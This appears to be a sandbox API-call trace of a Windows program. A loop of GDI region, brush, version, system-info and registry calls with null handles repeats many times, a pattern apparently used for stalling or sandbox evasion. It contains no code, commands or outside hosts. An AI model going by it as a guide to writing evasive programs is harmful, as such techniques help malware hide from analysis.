GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.010] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.010] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.010] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.010] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x20401d9 [0090.010] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x401dc [0090.010] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457a6 [0090.010] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457a7 [0090.010] CombineRgn (hrgnDst=0x10457a6, hrgnSrc1=0x20401d9, hrgnSrc2=0x401dc, iMode=1) returned 1 [0090.010] CombineRgn (hrgnDst=0x10457a7, hrgnSrc1=0x20401d9, hrgnSrc2=0x401dc, iMode=4) returned 2 [0090.010] CreateSolidBrush (color=0xff) returned 0x21057a5 [0090.010] CreateSolidBrush (color=0xff0000) returned 0x11057a8 [0090.011] DeleteObject (ho=0x11057a8) returned 1 [0090.011] DeleteObject (ho=0x401dc) returned 1 [0090.011] DeleteObject (ho=0x20401d9) returned 1 [0090.011] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.011] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.011] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.011] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.011] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.011] BeginPath (hdc=0x0) returned 0 [0090.011] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.011] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.011] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.011] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.011] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.011] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.011] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.011] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.011] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x10401dc [0090.011] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x30401d9 [0090.011] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457a9 [0090.012] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457aa [0090.012] CombineRgn (hrgnDst=0x10457a9, hrgnSrc1=0x10401dc, hrgnSrc2=0x30401d9, iMode=1) returned 1 [0090.012] CombineRgn (hrgnDst=0x10457aa, hrgnSrc1=0x10401dc, hrgnSrc2=0x30401d9, iMode=4) returned 2 [0090.012] CreateSolidBrush (color=0xff) returned 0x21057a8 [0090.012] CreateSolidBrush (color=0xff0000) returned 0x11057ab [0090.012] DeleteObject (ho=0x11057ab) returned 1 [0090.012] DeleteObject (ho=0x30401d9) returned 1 [0090.012] DeleteObject (ho=0x10401dc) returned 1 [0090.012] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.012] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.012] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.012] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.012] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.012] BeginPath (hdc=0x0) returned 0 [0090.012] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.012] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.012] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.012] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.012] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.012] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.012] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.012] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.013] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x40401d9 [0090.013] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x20401dc [0090.013] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457ac [0090.013] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457ad [0090.013] CombineRgn (hrgnDst=0x10457ac, hrgnSrc1=0x40401d9, hrgnSrc2=0x20401dc, iMode=1) returned 1 [0090.013] CombineRgn (hrgnDst=0x10457ad, hrgnSrc1=0x40401d9, hrgnSrc2=0x20401dc, iMode=4) returned 2 [0090.013] CreateSolidBrush (color=0xff) returned 0x21057ab [0090.013] CreateSolidBrush (color=0xff0000) returned 0x11057ae [0090.013] DeleteObject (ho=0x11057ae) returned 1 [0090.013] DeleteObject (ho=0x20401dc) returned 1 [0090.013] DeleteObject (ho=0x40401d9) returned 1 [0090.013] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.013] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.013] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.013] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.013] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.013] BeginPath (hdc=0x0) returned 0 [0090.013] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.013] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.013] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.013] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.014] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.014] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.014] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.014] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.014] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x30401dc [0090.014] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x50401d9 [0090.014] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457af [0090.014] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457b0 [0090.014] CombineRgn (hrgnDst=0x10457af, hrgnSrc1=0x30401dc, hrgnSrc2=0x50401d9, iMode=1) returned 1 [0090.014] CombineRgn (hrgnDst=0x10457b0, hrgnSrc1=0x30401dc, hrgnSrc2=0x50401d9, iMode=4) returned 2 [0090.014] CreateSolidBrush (color=0xff) returned 0x21057ae [0090.014] CreateSolidBrush (color=0xff0000) returned 0x11057b1 [0090.014] DeleteObject (ho=0x11057b1) returned 1 [0090.014] DeleteObject (ho=0x50401d9) returned 1 [0090.014] DeleteObject (ho=0x30401dc) returned 1 [0090.014] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.014] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.014] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.014] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.015] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.015] BeginPath (hdc=0x0) returned 0 [0090.015] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.015] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.015] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.015] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.015] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.015] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.015] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.015] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.015] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x60401d9 [0090.015] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x40401dc [0090.015] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457b2 [0090.015] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457b3 [0090.015] CombineRgn (hrgnDst=0x10457b2, hrgnSrc1=0x60401d9, hrgnSrc2=0x40401dc, iMode=1) returned 1 [0090.015] CombineRgn (hrgnDst=0x10457b3, hrgnSrc1=0x60401d9, hrgnSrc2=0x40401dc, iMode=4) returned 2 [0090.015] CreateSolidBrush (color=0xff) returned 0x21057b1 [0090.015] CreateSolidBrush (color=0xff0000) returned 0x11057b4 [0090.015] DeleteObject (ho=0x11057b4) returned 1 [0090.016] DeleteObject (ho=0x40401dc) returned 1 [0090.016] DeleteObject (ho=0x60401d9) returned 1 [0090.016] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.016] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.016] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.016] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.016] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.016] BeginPath (hdc=0x0) returned 0 [0090.016] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.016] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.016] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.016] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.016] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.016] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.016] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.016] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.016] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x50401dc [0090.016] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x70401d9 [0090.016] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457b5 [0090.017] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457b6 [0090.017] CombineRgn (hrgnDst=0x10457b5, hrgnSrc1=0x50401dc, hrgnSrc2=0x70401d9, iMode=1) returned 1 [0090.017] CombineRgn (hrgnDst=0x10457b6, hrgnSrc1=0x50401dc, hrgnSrc2=0x70401d9, iMode=4) returned 2 [0090.017] CreateSolidBrush (color=0xff) returned 0x21057b4 [0090.017] CreateSolidBrush (color=0xff0000) returned 0x11057b7 [0090.017] DeleteObject (ho=0x11057b7) returned 1 [0090.017] DeleteObject (ho=0x70401d9) returned 1 [0090.017] DeleteObject (ho=0x50401dc) returned 1 [0090.017] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.017] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.017] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.017] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.017] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.017] BeginPath (hdc=0x0) returned 0 [0090.017] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.017] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.017] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.017] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.017] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.017] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.017] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.017] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.018] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x80401d9 [0090.018] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x60401dc [0090.018] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457b8 [0090.018] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457b9 [0090.018] CombineRgn (hrgnDst=0x10457b8, hrgnSrc1=0x80401d9, hrgnSrc2=0x60401dc, iMode=1) returned 1 [0090.018] CombineRgn (hrgnDst=0x10457b9, hrgnSrc1=0x80401d9, hrgnSrc2=0x60401dc, iMode=4) returned 2 [0090.018] CreateSolidBrush (color=0xff) returned 0x21057b7 [0090.018] CreateSolidBrush (color=0xff0000) returned 0x11057ba [0090.018] DeleteObject (ho=0x11057ba) returned 1 [0090.018] DeleteObject (ho=0x60401dc) returned 1 [0090.018] DeleteObject (ho=0x80401d9) returned 1 [0090.018] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.018] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.018] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.018] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.018] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.018] BeginPath (hdc=0x0) returned 0 [0090.018] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.018] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.018] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.018] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.018] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.018] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.018] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.018] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.018] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x70401dc [0090.018] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x90401d9 [0090.018] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457bb [0090.018] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457bc [0090.019] CombineRgn (hrgnDst=0x10457bb, hrgnSrc1=0x70401dc, hrgnSrc2=0x90401d9, iMode=1) returned 1 [0090.019] CombineRgn (hrgnDst=0x10457bc, hrgnSrc1=0x70401dc, hrgnSrc2=0x90401d9, iMode=4) returned 2 [0090.019] CreateSolidBrush (color=0xff) returned 0x21057ba [0090.019] CreateSolidBrush (color=0xff0000) returned 0x11057bd [0090.019] DeleteObject (ho=0x11057bd) returned 1 [0090.019] DeleteObject (ho=0x90401d9) returned 1 [0090.019] DeleteObject (ho=0x70401dc) returned 1 [0090.019] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.019] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.019] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.019] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.019] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.019] BeginPath (hdc=0x0) returned 0 [0090.019] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.019] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.019] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.019] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.019] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.019] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.019] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.019] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.019] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa0401d9 [0090.019] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x80401dc [0090.019] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457be [0090.019] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457bf [0090.019] CombineRgn (hrgnDst=0x10457be, hrgnSrc1=0xa0401d9, hrgnSrc2=0x80401dc, iMode=1) returned 1 [0090.019] CombineRgn (hrgnDst=0x10457bf, hrgnSrc1=0xa0401d9, hrgnSrc2=0x80401dc, iMode=4) returned 2 [0090.019] CreateSolidBrush (color=0xff) returned 0x21057bd [0090.019] CreateSolidBrush (color=0xff0000) returned 0x11057c0 [0090.019] DeleteObject (ho=0x11057c0) returned 1 [0090.019] DeleteObject (ho=0x80401dc) returned 1 [0090.019] DeleteObject (ho=0xa0401d9) returned 1 [0090.019] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.019] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.019] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.020] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.020] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.020] BeginPath (hdc=0x0) returned 0 [0090.020] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.020] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.020] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.020] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.020] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.020] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.020] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.020] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.118] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x90401dc [0090.118] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb0401d9 [0090.118] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x960457ce [0090.118] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30457ca [0090.118] CombineRgn (hrgnDst=0x960457ce, hrgnSrc1=0x90401dc, hrgnSrc2=0xb0401d9, iMode=1) returned 1 [0090.118] CombineRgn (hrgnDst=0x30457ca, hrgnSrc1=0x90401dc, hrgnSrc2=0xb0401d9, iMode=4) returned 2 [0090.118] CreateSolidBrush (color=0xff) returned 0x21057c0 [0090.118] 